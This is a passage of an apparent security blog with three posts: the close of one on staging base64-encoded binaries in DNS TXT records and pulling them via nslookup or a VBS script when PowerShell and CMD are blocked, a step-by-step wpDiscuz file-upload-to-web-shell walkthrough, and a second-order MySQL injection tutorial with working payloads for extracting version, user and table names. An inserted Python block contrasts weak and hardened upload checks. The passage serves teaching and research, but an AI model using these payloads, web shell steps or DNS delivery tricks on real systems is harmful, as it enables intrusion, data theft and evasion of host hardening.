/></h2><p>To get the actual data, we need to perform base64 decoding, and it can be achieved using PowerShell.</p><p>The below mentioned PowerShell code helps the user get the base64 decoded data from the encoded string:</p><p style="text-align: left;"><br />
<textarea style="height: 100px; margin: 0px; width: 700px;">$all = "base64_encoded_string_goes_here"
$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($all))
$text
</textarea>
<br /></p><h2 style="text-align: left;"> Importing big text </h2><p>To import text, I used the "Namecheap" domain service. There may be a restriction on the TXT record input data, depending on the DNS server implementation.<br /></p><p>In case the user is not able to insert the complete text due to the data limit, the user can associate multiple TXT records with a domain name. </p><p>So to import text which is longer than what you can specify in one TXT record, add multiple TXT records. When the DNS query is performed, all of the data will be fetched.</p><p>I converted the binary file data into base64 encoded form and specified it in the TXT record:<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLikUumTABd2jXcyWUnhgVy9r8OT_EXJ6CwKPi6ATfsCKMh6FgtElOZNUbpfkjfOA6-BAXk93n_t-ZwscKH1W1GOM3EjZl0lYd1MQJyFp7DVfmSqyVmynyya2g5P_9o38lQW78rf95XY/s1161/0.2.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="190" data-original-width="1161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLikUumTABd2jXcyWUnhgVy9r8OT_EXJ6CwKPi6ATfsCKMh6FgtElOZNUbpfkjfOA6-BAXk93n_t-ZwscKH1W1GOM3EjZl0lYd1MQJyFp7DVfmSqyVmynyya2g5P_9o38lQW78rf95XY/s640/0.2.png" width="640" /></a></p> Then I performed the DNS query to get the data embedded in the TXT record:<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvNL2kNXq8LEWxNCVi9pWz24M6zpRK_P-L91tZw2mkFLH_RWon8Zbx3-Nt2W10p8kg4Uc51bEBjMiuo8ydJeJx81nuR-7cOXcRp_9Vyyu5K6GcAHvm327xnwzZOX50ER0dw7qJPqLHL8Q/s1198/8.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="466" data-original-width="1198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvNL2kNXq8LEWxNCVi9pWz24M6zpRK_P-L91tZw2mkFLH_RWon8Zbx3-Nt2W10p8kg4Uc51bEBjMiuo8ydJeJx81nuR-7cOXcRp_9Vyyu5K6GcAHvm327xnwzZOX50ER0dw7qJPqLHL8Q/s640/8.png" width="640" /></a></div><p>Now, perform the base64 decoding operation on the grabbed text and save it in a file.<br /></p><h2 
style="text-align: left;">PowerShell and CMD are restricted <br /></h2><p> In case the host machine is hardened and the user is not allowed to access either PowerShell or CMD, we can use VBS code to perform the DNS query.<br />Here is the code which will perform the DNS query and save the output to the file "nslookup.txt" in the "C:\Users\box\Desktop\" directory:<br /><br />
<textarea style="height: 150px; margin: 0px; width: 900px;">Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Users\box\Desktop\nslookup.txt",2,true)
Set objShell = CreateObject("WScript.Shell")
Set objWshScriptExec = objShell.Exec("nslookup.exe -querytype=txt b0x2.mannulinux.org")
Set objStdOut = objWshScriptExec.StdOut
While Not objStdOut.AtEndOfStream
strLine = objStdOut.ReadLine
objFileToWrite.WriteLine(strLine)
Wend
objFileToWrite.Close
Set objFileToWrite = Nothing
</textarea>
<br />Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>
<br />
</p><div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-84708985428217890192020-07-29T09:36:00.001+05:302023-11-23T10:33:00.173+05:30Arbitrary file upload vulnerability in Wordpress wpDiscuz plugin <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Today I was going through Twitter and in one of the tweets I got to know about a vulnerability in the "Wordpress wpDiscuz plugin". This vulnerability was discovered by the <a href="https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/" target="_blank">Wordfence Team</a>. <br />
<br />
The vulnerability is simple and can be exploited if the user has permission to upload an image as an attachment.<br />
The plugin only checks the file's "magic number" and does not perform any check on the file extension.<br />
<br />
Here an attacker can take advantage of this to achieve "Remote Code Execution" by following the steps below:<br />
<br />
<b>Step 1:</b> Rename an image file to a .php extension.<br />
<br />
<b>Step 2: </b>Open the renamed file in a text editor, append PHP code at the end of the file and save it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSArSuDJjG7g86tXM0kwYNXwsglD7ibyHOuQvrcCMtnB-Glfuw7aAD7RijlAZ5yCqGq5ikN56cumBfvjZ0fEWB9h2y3AmIPZrkCpo207hMbYeRFhTqIwdMrSYezuCx3K4h583uYoEMKU8/s1600/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="626" data-original-width="1106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSArSuDJjG7g86tXM0kwYNXwsglD7ibyHOuQvrcCMtnB-Glfuw7aAD7RijlAZ5yCqGq5ikN56cumBfvjZ0fEWB9h2y3AmIPZrkCpo207hMbYeRFhTqIwdMrSYezuCx3K4h583uYoEMKU8/s1600/2.png" /></a></b></div>
<br />
<br />
<b>Step 3: </b>Go to the website's comment section and click in the comment box to write a comment.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDE1Pjvqvh4Xa5F3ZPNPYQFFmPdKPcg27UYR3x5jyTQWnMjz-cvz5kuiBUBk-AZw_sby6ilj-4OFOnr86GZWhoczlmDqj8duuVV80seomV64aeLWPH_67mbdHlcxIyYbBeURBK-fGa7Ik/s1600/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="860" data-original-width="1512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDE1Pjvqvh4Xa5F3ZPNPYQFFmPdKPcg27UYR3x5jyTQWnMjz-cvz5kuiBUBk-AZw_sby6ilj-4OFOnr86GZWhoczlmDqj8duuVV80seomV64aeLWPH_67mbdHlcxIyYbBeURBK-fGa7Ik/s1600/1.png" /></a></div>
<br />
<b>Step 4: </b>The web application's comment box has an option for image file attachments. Click the icon and browse to the file which we modified in step 2.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj59-HvScyVqhbeemSq_Mb2_rPXjmjy9nSubVylO-Oc5ohvUJmWNLEfEDtfMAzDl4NAM2die9A5qtYL5S2cU6YMoD2ZuZ1qsJpf2mNLVPy6YCXpRbF_YsTjMgD70ttrT6gx98ZD4cQzCoY/s1600/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="1000" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj59-HvScyVqhbeemSq_Mb2_rPXjmjy9nSubVylO-Oc5ohvUJmWNLEfEDtfMAzDl4NAM2die9A5qtYL5S2cU6YMoD2ZuZ1qsJpf2mNLVPy6YCXpRbF_YsTjMgD70ttrT6gx98ZD4cQzCoY/s1600/3.png" /></a></div>
<br /><b>Step 5: </b>Fill in the form with the relevant information and post the comment.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLS5m4GqXrW9MYmstsRlHO7lO_UkpFwJ9CkNFGqIiOfSQSYeCdy8ihtxXxqj7QF_fC0erJspzl4vQMDK8s8Yt1SAPtxMcATEOZAxkWMalxkXdqqgSnfiWT1Lt6Exu1t2IH7udkMb8wv0s/s1600/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="651" data-original-width="1217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLS5m4GqXrW9MYmstsRlHO7lO_UkpFwJ9CkNFGqIiOfSQSYeCdy8ihtxXxqj7QF_fC0erJspzl4vQMDK8s8Yt1SAPtxMcATEOZAxkWMalxkXdqqgSnfiWT1Lt6Exu1t2IH7udkMb8wv0s/s1600/4.png" /></a></div>
<br />
<b>Step 6: </b>The web application shows the uploaded image attachment. Copy the image file URL.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi16iy_8yCfetQKaftZAjF6X5BPsECVvtZB_3eBoYugr3Y9Pp3gAs79R4TUtE9sU-ufuMV87Ha0mVPddsNR6tafYjTyqas1mPGru11sCBq8SAQl8HV8OFOhsyM7fNsz2DjbKj37aR_zSkY/s1600/5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="621" data-original-width="1102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi16iy_8yCfetQKaftZAjF6X5BPsECVvtZB_3eBoYugr3Y9Pp3gAs79R4TUtE9sU-ufuMV87Ha0mVPddsNR6tafYjTyqas1mPGru11sCBq8SAQl8HV8OFOhsyM7fNsz2DjbKj37aR_zSkY/s1600/5.png" /></a></div>
<br /> <b>Step 7: </b>In the copied URL, remove the "-" symbol and the image dimensions (they are at the end, just before the .php extension).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9RIM_WjK_IvCHjCD3LXfGWvmML1UGTfqwNIksasMyNslOSTcK-Klt2qt3NvJee8XdNxzIx-WxEmg8Bt3scIkTIP8qtw5sCRwcQnYjjHF1FdryzmbEAbc2MmHz-H98n2Je5_J_GYbXOo/s1600/6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="110" data-original-width="1069" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9RIM_WjK_IvCHjCD3LXfGWvmML1UGTfqwNIksasMyNslOSTcK-Klt2qt3NvJee8XdNxzIx-WxEmg8Bt3scIkTIP8qtw5sCRwcQnYjjHF1FdryzmbEAbc2MmHz-H98n2Je5_J_GYbXOo/s1600/6.png" /></a></div>
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaiumZKputJ6UmAejsr1SkuBWQH4D56p5nPZkCP6aH0Jhy68dsNUzE-_YlMri0NZxFbuYmbI7bBJYpaCwRVlv7m3CLMZa1bTBxFChQHiwvgWfCkm3dZVeHCW9UznugpmzzC1Cp1SPfQBU/s1600/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="231" data-original-width="1226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaiumZKputJ6UmAejsr1SkuBWQH4D56p5nPZkCP6aH0Jhy68dsNUzE-_YlMri0NZxFbuYmbI7bBJYpaCwRVlv7m3CLMZa1bTBxFChQHiwvgWfCkm3dZVeHCW9UznugpmzzC1Cp1SPfQBU/s1600/7.png" /></a></div>
<br /><br />
<b>Step 8: </b>Browse to the URL and we have access to the web shell. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy_MmQS41laCRhEWSeUzHPiRjG7JLs2kPF4MAakSKtGNLd2Izgr7-LcN-DU6-GiphcJi1LtBibm0CySimgfOS3S-aJ0nSEDVjh1kFzXBqjhxkUlKkmj0sWVB2sJxop7tVqjFKjjZjklnQ/s1600/8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="689" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy_MmQS41laCRhEWSeUzHPiRjG7JLs2kPF4MAakSKtGNLd2Izgr7-LcN-DU6-GiphcJi1LtBibm0CySimgfOS3S-aJ0nSEDVjh1kFzXBqjhxkUlKkmj0sWVB2sJxop7tVqjFKjjZjklnQ/s1600/8.png" /></a></div>
<br />
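The weakness above is that the attachment check looks only at the leading bytes. The following is an added example, not the plugin's code or Wordfence's, written in Python to show a magic-number-only check beside a hardened one (extension allow-list, extension/content agreement, rejection of embedded PHP tags, server-chosen file names). The magic numbers, the sample PNG bytes and the appended PHP marker are constructed for the example.

```python
import os
import secrets

# Constructed magic numbers for the image types an attachment upload would accept.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# Byte sequences an image should never contain: their presence means server-side
# code was appended after the image data, as in steps 1 and 2 of the post.
PHP_MARKERS = (b"<?php", b"<?=")


def detect_image_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for kind, magic in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def magic_only_check(filename: str, data: bytes) -> bool:
    """The weak check described in the post: the leading bytes look like an
    image, so the file is accepted; the file name and extension are never used."""
    return detect_image_type(data) is not None


def hardened_check(filename: str, data: bytes) -> bool:
    """Accept only when the extension is allow-listed, matches the detected
    content type, and the body carries no PHP open tag."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        return False
    kind = detect_image_type(data)
    if kind is None:
        return False
    expected = {"jpg", "jpeg"} if kind == "jpg" else {kind}
    if ext not in expected:
        return False
    return not any(marker in data for marker in PHP_MARKERS)


def storage_name(data: bytes) -> str:
    """Server-chosen file name: a random token plus an extension derived from
    the content, so nothing from the uploaded name reaches the filesystem."""
    kind = detect_image_type(data)
    if kind is None:
        raise ValueError("not a recognised image")
    return f"{secrets.token_hex(16)}.{kind}"


# Constructed samples: a minimal PNG-looking blob, and the same blob with a
# harmless PHP tag appended, as an uploader renaming it to .php would do.
CLEAN_PNG = IMAGE_MAGIC["png"] + b"\x00" * 32
PNG_WITH_PHP_TRAILER = CLEAN_PNG + b"<?php /* constructed marker */ ?>"


if __name__ == "__main__":
    print(magic_only_check("image.php", PNG_WITH_PHP_TRAILER))  # True: weak check accepts it
    print(hardened_check("image.php", PNG_WITH_PHP_TRAILER))    # False: extension rejected
    print(hardened_check("photo.png", CLEAN_PNG))               # True
    print(storage_name(CLEAN_PNG))                              # <random hex>.png
```

The checks are only half of the fix: uploads should also be written to a location where the web server never executes scripts.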
Thanks for reading.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-36844531648143819332020-04-19T20:51:00.002+05:302023-11-23T10:34:11.870+05:30Exploiting SQL Injection in insert query - Second order SQL injection<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
Today we are going to discuss an SQL Injection exploitation scenario in which there is only one user-controlled input parameter and its value is passed to an Insert SQL query.<br />
In this case, the column in which the user-supplied data is saved is the last one, and the user cannot specify extra columns.<br />
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">Description:</span></span></h2>
The SQL query which is vulnerable to SQL injection has the following attributes:<br />
<br />
Table name: exploit_list<br />
Column names: ID, date and vulnerability<br />
<br />
The SQL insert query implemented in the code:<br />
<textarea cols="50" rows="2" style="height: 30px; width: 789px;">insert into exploit_list(date,vulnerability) values('date("F j, Y, g:i a")','user_supplied_data') </textarea><br />
Here, the attacker can control the value for the column "vulnerability".<br />
<br />
In the above scenario, we have 2 restrictions:<br />
<ol style="text-align: left;">
<li>The application code has an SQL Injection in the "Insert query" but does not show any SQL server error. Because of this, the attacker cannot exploit the SQL Injection using the "Error based SQL Injection" technique.</li>
<li>The user-controlled data is passed to the column which is specified at the end of the SQL query, and the attacker cannot override the columns.</li>
</ol>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">Attack outline:
</span></span></h2>
To exploit the SQL Injection, the following trick can help:<br />
<ol style="text-align: left;">
<li>close the data delimiter (single quote)</li>
<li>use the + operator to join the expression to the string (+ in this case because I am performing this on a MySQL server; note that in MySQL + is numeric addition, so whatever is injected must evaluate to a number, which is why the next steps convert the character to ASCII)</li>
<li>use the substring function to grab the data character by character</li>
<li>convert the grabbed character to its ASCII code</li>
<li>use the + operator again (as in step 2)</li>
<li>close the data delimiter (single quote) </li>
<li>Access the web page where the application shows the user-supplied inserted data. </li>
</ol>
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">Application working:
</span></span></h2>
The web application has an interface which allows the user to insert data into the database.<br />
Also, the user can view the inserted data via the "Vulnerability List" functionality.<br />
<br />
Here are the source code and the database dump file: <a href="https://github.com/incredibleindishell/insert_SQLI" target="_blank">https://github.com/incredibleindishell/insert_SQLI</a><br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">1. Extracting the SQL server version</span></span></h2>
To extract the SQL server version, the payload below will help:<br />
<textarea cols="20" rows="1" style="height: 28px; width: 150px;">0'+ version() +'0</textarea><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAf5CzjVIh3n7SilBPvC8RIRSph6qoxi9zIgQjkbHRniM7rRshNncKZU1yYcn4-nL3tWDdQ9PM-dJqM4mymPTgJGej4QBQQDNIkV-_2Ol5b7y-8CT9ywQrl64N3xTpVPXmGF0XC_XMzoI/s1600/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="376" data-original-width="820" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAf5CzjVIh3n7SilBPvC8RIRSph6qoxi9zIgQjkbHRniM7rRshNncKZU1yYcn4-nL3tWDdQ9PM-dJqM4mymPTgJGej4QBQQDNIkV-_2Ol5b7y-8CT9ywQrl64N3xTpVPXmGF0XC_XMzoI/s1600/3.png" /></a></div>
<br />
Visit the module which shows the list of added entries. In the column to which the user-supplied data is passed, the injected SQL Injection payload has been executed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiewtC2Xxrv_uueQETrS0Pj0irHuQX7oMNrk2ZNH_bBbZWSmYM3s8_uSgzK0Kb5AqdQjEML3DbDVPr-jTD7Em0tPdGKWdcdqxrf1K5F4YkPlTv9CACviFkGg414F4YlXJWRHDB78pIP6dw/s1600/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="161" data-original-width="992" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiewtC2Xxrv_uueQETrS0Pj0irHuQX7oMNrk2ZNH_bBbZWSmYM3s8_uSgzK0Kb5AqdQjEML3DbDVPr-jTD7Em0tPdGKWdcdqxrf1K5F4YkPlTv9CACviFkGg414F4YlXJWRHDB78pIP6dw/s1600/4.png" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">2. Extracting the length of the current SQL server username:</span></span></h2>
To extract the length of the current SQL server user name which is configured in the web application, the payload below will help: <br />
<textarea cols="20" rows="1" style="height: 26px; width: 170px;">0'+length(user())+'0</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifGLwYTHJmzvlneVxC0E08lLX0BPl2vJdgoUtxlxsxyv32MJbAQEpVRZgpo5VXe_GTtFHsYF1cvzUIg5VCjEtNaaIFYXfC1-_1bWseXqerCcxZdyhdpXwQxNHzo_f1JM-neCUxg_ddJBk/s1600/5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="774" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifGLwYTHJmzvlneVxC0E08lLX0BPl2vJdgoUtxlxsxyv32MJbAQEpVRZgpo5VXe_GTtFHsYF1cvzUIg5VCjEtNaaIFYXfC1-_1bWseXqerCcxZdyhdpXwQxNHzo_f1JM-neCUxg_ddJBk/s1600/5.png" /></a></div>
<br />
Now the web application has executed the SQL Injection payload and the attacker can see the output. In this case, the length of the current SQL server user name is 14 (root@localhost). <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggQ09EzGFqkON9XdqKOQJDxoMpRlGYQ3frCnbwHrptC3ymeMi0VXkBuhfScee4ULuOwHcsFXJbd9TAQg55V25XueQgxQsdZBRhG_4ACssrhOQOj8S6FaoupO7jkaR-CLmSvDx6Htw9iKM/s1600/6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="131" data-original-width="1105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggQ09EzGFqkON9XdqKOQJDxoMpRlGYQ3frCnbwHrptC3ymeMi0VXkBuhfScee4ULuOwHcsFXJbd9TAQg55V25XueQgxQsdZBRhG_4ACssrhOQOj8S6FaoupO7jkaR-CLmSvDx6Htw9iKM/s1600/6.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">3. Extracting the SQL server username:</span></span></h2>
<div style="text-align: left;">
To extract the first character of the SQL server user name, the payload below will help:</div>
<div style="text-align: left;">
<textarea cols="20" rows="1" style="height: 24px; width: 285px;">0'+ascii(substring(user(),1,1))+'0</textarea>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLlRPbHq2UWh2d24aNFkQ_e1QV9fPondAObloYJwyJls71CtZkeOGeN3LtiFWhLGszohT9cr2jrR74QO2wQEMMOheUkIHD3XLk8Jx_MK9jnOT_ssTmsr-Qs-xQub0JAcV-EMJf9yS4OUc/s1600/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="887" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLlRPbHq2UWh2d24aNFkQ_e1QV9fPondAObloYJwyJls71CtZkeOGeN3LtiFWhLGszohT9cr2jrR74QO2wQEMMOheUkIHD3XLk8Jx_MK9jnOT_ssTmsr-Qs-xQub0JAcV-EMJf9yS4OUc/s1600/7.png" /></a></div>
<br />
The web application executed the payload and shows the ASCII representation (114) of the letter 'r'. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisW7Xl9UjAuuAmbzLcm9xPOJ_xXxv-xgHtWcqtySlSm2Ch9easKvYS_3VULmztz10E79zZzsKA0L9CtfNmhdyPBhSY3dfguGI88Y3Ie09QDxZX_ehMBGfnEeQ-r2Q-VdcLdHtsv1FH9V4/s1600/8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="139" data-original-width="1084" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisW7Xl9UjAuuAmbzLcm9xPOJ_xXxv-xgHtWcqtySlSm2Ch9easKvYS_3VULmztz10E79zZzsKA0L9CtfNmhdyPBhSY3dfguGI88Y3Ie09QDxZX_ehMBGfnEeQ-r2Q-VdcLdHtsv1FH9V4/s1600/8.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
To extract the second character, we just need to increment the value of the second parameter. The payload will be:<br />
<textarea cols="20" rows="1" style="height: 25px; width: 295px;">0'+ascii(substring(user(),2,1))+'0</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxkoNRKIGBPU9DMarTGWlWk93i85dD_XRqJj7CpMQnHFHbCbAbnkFuWuPWp-O0JNinKl6i9RTY8-jFGTI_XyGFzk81tQ1QsX0N6vXkOK2m5GIWC9kgrxBNdZoXQeNtZvzSgqIk2MccCaM/s1600/9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="231" data-original-width="884" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxkoNRKIGBPU9DMarTGWlWk93i85dD_XRqJj7CpMQnHFHbCbAbnkFuWuPWp-O0JNinKl6i9RTY8-jFGTI_XyGFzk81tQ1QsX0N6vXkOK2m5GIWC9kgrxBNdZoXQeNtZvzSgqIk2MccCaM/s1600/9.png" /></a></div>
<br />
The web application executed the SQL Injection payload and shows that the second character of the SQL server user name is "111", which is the ASCII representation of the letter "o".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikPK1fB_KoWUCbNj6RMz3h66Yn0iL6nO4KFD7FyhQWfC75jTQ7d7OYT12ETugh61BYeKnJiV55Qjj5TPScbgLl822HeS-Q1GGlSpmio2-ENt3Sdu6LO5-PAGHESp26kFNAGT_etjPD_9U/s1600/10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="109" data-original-width="1133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikPK1fB_KoWUCbNj6RMz3h66Yn0iL6nO4KFD7FyhQWfC75jTQ7d7OYT12ETugh61BYeKnJiV55Qjj5TPScbgLl822HeS-Q1GGlSpmio2-ENt3Sdu6LO5-PAGHESp26kFNAGT_etjPD_9U/s1600/10.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h2 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">4. Extracting the name of the table in current database:</span></span></h2>
Before proceeding to extract the table name via the web application interface, let's confirm it by executing the SQL query in the SQL server console.<br />
In the current database we have 3 tables and the first table is "exploit_list". During table name extraction, this is the table which will be extracted by our SQL injection payload. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1gz6Vt3vU6AjrPzdClK090V4CyLHgbx-s0g89ByKm8T7yxLiniG5CNbPu8t4_VsFjwD0n-6tTz7u3w9PZmh3IrJvPY9r3kUFQvIE8CwY7Qo60B5MczubqnBFtTqlvbIYMlwkY44pRuQo/s1600/11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="338" data-original-width="1381" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1gz6Vt3vU6AjrPzdClK090V4CyLHgbx-s0g89ByKm8T7yxLiniG5CNbPu8t4_VsFjwD0n-6tTz7u3w9PZmh3IrJvPY9r3kUFQvIE8CwY7Qo60B5MczubqnBFtTqlvbIYMlwkY44pRuQo/s1600/11.png" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #dddddd;">4.1 Payload to extract the first character of the first table name in current database: </span></span></h3>
</div>
<div style="text-align: left;">
The payload to extract the first character of the table name will be like this:</div>
<div style="text-align: left;">
<textarea cols="20" rows="1" style="height: 27px; width: 978px;"> 0'+ ascii(substring( (select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))+ '0 </textarea>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
